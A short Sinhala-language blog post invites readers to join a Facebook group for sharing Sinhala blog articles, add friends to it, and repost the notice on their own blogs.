කොහොමද කස්ටිය එහෙම.....මම ඔයාලට ගොඩක් වැදගත් වන දෙයක් ගැන කියනව.මෙම Group එක ඔබට ඔබේ සිංහල බ්ලොග් වල ඇති වටිනා ලිපි පල කිරීමට විවෘතය.Group එකේ ලින්ක එක පහත දාල ඇති. http://www.facebook.com/groups/sinhalabloggers/ ඔබට කරන්න තියෙන්නෙ ඉහත ලින්ක් එක ක්ලික් කරල Group එකට ගගිල්ල Join වෙලා පුළුවන් තරම් යාළුවන් එකතු කරන එක.ඊට පස්සෙ ඔයාලගෙ හෝ වෙනත් බ්ලොග් වල ඇති වටිනා සිංහල ලිපි ඇත්නම් එය මේ Group එකේ ඵල කිරීමෙන් ඒවා සාමාජිකයන් අතර බෙදා ගත හැක. මෙම ලිපිය ඔයාලගෙ බ්ලොග් වලත් ඵල කරන්න.ඒ සඳහා කොපි පේස්ට් කළාට කමක් නෑ.එහෙනම් මම ගියා. http://dulara-dulara.blogspot.com වෙතින් උපුටා ගැනීමකි.